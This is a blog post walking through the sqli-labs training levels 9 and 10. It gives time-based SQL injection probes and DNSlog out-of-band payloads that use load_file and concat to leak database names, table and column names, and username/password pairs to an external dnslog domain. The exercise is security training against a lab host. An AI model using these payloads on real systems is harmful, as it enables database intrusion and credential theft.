sqli-labs靶场less-9和less-10

子非鱼9992024-10-08 21:05

sqli-labs靶场less-9

本文只展示如何利用dnslog注入通过本关,注入原理可以参考我另外一篇文章

DSNlog注入原理

1、确定闭合方式

http://192.168.140.130/sq/Less-9/?id=1

发现id的值不论为任何值,页面回显都是一致的You are in...

判断不存在布尔注入,报错注入

用dnslog注入,构造1' and sleep(2) --+确定闭合方式

可以将单引号修改为",'),')),"),"))等,查看页面回显时间,最终确定语句为

http://192.168.140.130/sq/Less-9/?id=1' and sleep(2) --+

页面回显延迟,确定闭合方式为' '

2、平台选取

打开网址 https://eyes.sh/login ,注册账号

也可以使用其他平台,更多平台可以参考我上面提到的连接

登入进去

3、dnslog注入

构造语句

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select database()),'.zifei.eyes.sh/test.txt'))) --+

concat是为了将里面的值拼接起来

zifeiyu.eyes.sh是自己在eses.sh中注册

查看网页得到数据库名

数据库版本

爆出所有数据库

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 0,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 1,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 2,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 3,1),'.zifei.eyes.sh/test.txt'))) --+

此处图片只列举一些

爆出security的所有表

  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 2,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 3,1),'.zifei.eyes.sh/test.txt'))) --+

爆出列名

  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),'.zifei.eyes.sh/test.txt'))) --+

爆出数据

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select concat(username,'.',password) from security.users limit 0,1),'.zifei.eyes.sh/test.txt'))) --+

只需要修改0的值,便可以得到所有的值

less-10

本关与第九关用dnslog通过方式一样,只不过闭合方式为";其他一致

相关推荐
大方子20 小时前
【好靶场】垂直越权任意添加用户
网络安全·好靶场
介一安全20 小时前
【Web安全】Blind XSS漏洞:从挖掘到防御
安全·web安全·xss
tjl521314_2120 小时前
01C++ 分离编译与多文件编程
前端·c++·算法
sayamber20 小时前
vLLM 容器化部署实战:如何在云服务器上跑起高并发大模型推理服务
前端
LIO20 小时前
Pinia 极简指南:Vue 3 官方状态管理库
前端·vue.js
2401_8314194421 小时前
如何防止MongoDB副本集被误初始化_副本集名称(replSetName)锁定
jvm·数据库·python
阿丰资源21 小时前
基于Spring Boot的美容院管理系统(附源码+数据库+文档)
数据库·spring boot·后端
徐子童21 小时前
复合索引会失效的场景
数据库·mysql·面试题·索引失效
abc123456sdggfd21 小时前
解决Socket图像传输中断问题:基于分块接收与可靠发送的完整教程
jvm·数据库·python
2401_8330336221 小时前
SQL中RIGHT JOIN真的很少用吗_数据完整性检查与反向关联分析
jvm·数据库·python
热门推荐
01GitHub 镜像站点02近期有什么ai的新消息,新动态? 2026.4月03Codex 接入 DeepSeek API 完整配置文档042026年4月AI大事件深度解读:大模型竞争进入“深水区“05【AI】2026 年具身智能模型和世界模型总结062026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot07实测可用|小米 MiMo 百万亿 Token 免费领,开发者速冲08在Windows 11上安装Docker的踩坑记录09裂开!ChatGPT 居然开始要手机号验证,附详细解决方法10VSCode + Copilot下:配置并使用 DeepSeek